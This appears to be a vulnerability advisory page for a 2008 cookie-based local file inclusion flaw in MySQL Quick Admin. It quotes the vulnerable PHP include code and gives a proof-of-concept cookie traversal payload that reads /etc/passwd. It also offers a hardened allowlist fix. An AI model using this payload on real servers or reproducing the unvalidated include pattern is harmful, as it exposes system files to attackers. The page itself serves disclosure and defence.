Vendor: MySQL Quick Admin
Author: JosS
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Inclusion
CWE: 22
Product Name: MySQL Quick Admin
Affected Version From: 1.5.2005
Affected Version To: 1.5.2005
Patch Exists: YES
Related CWE: N/A
CPE: a:mysql_quick_admin:mysql_quick_admin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability

MySQL Quick Admin version 1.5.5 and below is vulnerable to Local File Inclusion because the application does not validate the user-supplied value of the 'language' cookie before using it to build an include path. An attacker can use this to include arbitrary files readable by the web server process, such as the system's '/etc/passwd', resulting in the disclosure of sensitive information. Exploitation consists of setting the 'language' cookie to a traversal value such as '../../../../../../../../../../etc/passwd%00; path=/' and then requesting '/index.php'.

Mitigation:

Validate the value of the 'language' cookie before it is used to build an include path in /includes/required.php: accept only a value that names one of the application's installed language directories, and fall back to the default language for anything else.
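A hardened form of the language selection from /includes/required.php, written for this page as an added example and not MySQL Quick Admin's own code; the lang directory location, the function name resolve_language and the default of 'english' are assumptions:

```php
<?php
// Added example, not the project's code. Assumes the language packs live in
// a "lang" directory beside this file and that "english" is the default.

/**
 * Return the language name to load, accepting only a plain directory name
 * that actually exists as an installed language pack under $langRoot.
 */
function resolve_language(?string $requested, string $langRoot, string $default = 'english'): string
{
    // Reject anything that is not a simple name: this rules out "../",
    // slashes, NUL bytes ("%00") and any other path-altering characters.
    if ($requested === null || !preg_match('/\A[a-z_]{1,32}\z/', $requested)) {
        return $default;
    }
    // Allowlist check: the name must correspond to a real language pack.
    if (!is_file($langRoot . '/' . $requested . '/lang.php')) {
        return $default;
    }
    return $requested;
}

$langRoot = __DIR__ . '/lang';

// Validate the cookie before it is stored in the session, and validate the
// session value again before use, so a stale or tampered session value
// cannot reach the include path either.
if (!isset($_SESSION['language'])) {
    $_SESSION['language'] = resolve_language($_COOKIE['language'] ?? null, $langRoot);
}
$_LANG = resolve_language($_SESSION['language'], $langRoot);
require $langRoot . '/' . $_LANG . '/lang.php';
```

With this in place the cookie value from the proof of concept fails the pattern check and the default language is loaded instead.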

Exploit-DB raw data:

# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# url: http://www.mysqlquickadmin.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
# Greetz To: Pepelux :)
#
# *Requirements: magic_quotes_gpc = Off

vuln file: /includes/required.php
vuln code: 

// The 'language' cookie is copied into the session without any validation.
if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
	$_SESSION['language'] = $_COOKIE['language'];
}

....

if(LANG == ""){
	if(!isset($_SESSION['language'])){
		include("lang/english/lang.php");
		$_LANG = "english";
	} else {
		// The unvalidated session value is concatenated into the include path,
		// so a traversal sequence selects an arbitrary file; with
		// magic_quotes_gpc off, a %00 byte is passed through and, on the PHP
		// versions of the time, truncates the trailing "/lang.php".
		include("lang/".$_SESSION['language']."/lang.php");
		$_LANG = $_SESSION['language'];
	}

... }

LFI (poc): 
1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
2) then request /index.php

Ingenious work :D

# milw0rm.com [2008-10-01]